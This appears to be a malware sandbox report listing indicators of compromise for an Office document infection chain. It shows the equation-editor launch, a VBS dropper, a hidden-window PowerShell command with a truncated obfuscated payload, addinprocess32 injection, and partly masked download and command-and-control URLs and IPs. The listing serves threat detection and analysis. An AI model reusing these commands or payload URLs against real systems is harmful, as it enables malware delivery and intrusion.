Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wednesdayymorningfile.vbs"
- %WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe
- %APPDATA%\wednesdayymorningfile.vbs
- '19#.#2.81.134':80
- 'pa##e.ee':443
- 'pk#.goog':80
- '45.#4.19.84':80
- '17#.#45.214.91':80
- http://19#.#2.81.134/wedmothergoldf###upbysomeonetointernationalloverfailuretounderstandhowfasterthenbeforetoundrser.doc
- http://19#.#2.81.134/wednesdayymorningfile.vbs
- http://pk#.goog/gsr1/gsr1.crt
- http://45.#4.19.84/xampp/bkp/vbs_novo_new_image.jpg
- http://17#.#45.214.91/uchebas63333333333333.txt
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- DNS ASK pk#.goog
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe'